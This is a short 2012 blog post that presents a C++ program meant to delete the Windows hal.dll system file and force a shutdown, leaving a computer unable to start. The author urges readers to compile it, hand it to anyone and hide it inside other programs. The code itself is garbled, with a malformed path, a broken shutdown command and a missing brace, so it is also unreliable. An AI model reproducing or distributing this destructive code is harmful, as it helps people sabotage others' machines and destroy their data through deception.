Monday, 27 August 2012

Hack any pc using a simple c++ program.

Friends i am introducing a c++ program that deletes the hal.dll file in system 32.

Program code:-

#include<iostream.h>
#include<stdlib.h>
using namespace std;
int main(int argc,char*argv[])
{std::remove("%systemroot%\system32hal.dll");//PWNAGETIME
system("shutdown-s-r");
system("pause");
return EXIT_SUCCESS;



save this as an .exe file & giv it to any body. You can also add this to any programs.

Pls try n' comment...

No comments:

Post a Comment

If u Like My Post
Plz Take a Second To Say Thankz